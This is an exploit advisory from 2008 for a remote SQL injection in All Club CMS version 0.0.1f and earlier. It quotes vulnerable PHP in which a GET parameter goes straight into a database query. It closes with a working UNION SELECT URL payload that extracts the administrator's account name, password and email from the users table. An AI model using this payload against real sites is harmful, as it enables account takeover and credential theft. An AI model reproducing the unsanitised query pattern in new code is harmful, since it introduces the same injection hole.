-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
All Club CMS <= 0.0.1f index.php Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
bug found by ka0x
D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
http://www.domlabs.org/
Script affected: All Club CMS
Vulnerability: Remote SQL Injection
Download: http://sourceforge.net/project/showfiles.php?group_id=209058
need magic_quotes_gpc = off
vuln code:
[...]
if (isset($_GET['name']) && (!(empty($_GET['name'])))) {
$name = $_GET['name'];
$name = stripslashes($name);
// stop hackers
if (eregi("http\:\/\/", $name)) {
echo "
No go on the hack attempt.
";
// log attempt, from IP, etc.
if ($SYS_SET['ban_attack_ip']) {
// ban ip if ban_attack_ip
}
die();
}
$sth = $dbh->prepare("SELECT * FROM accms_modules WHERE name='$name'");
[...]
Stripslashes function only deletes backslashes (\) and the backslashes
doubles (\\) becomes simple (\).
Exploit:
http://[host]/accms_path/index.php?name=-1'/**/union/**/select/**/1,concat(account,0x3a,password,0x3a,email),3,4,5,6,7,8,9,1,1,1,1/**/from/**/accms_users/**/where/**/id=1/*
__EOF__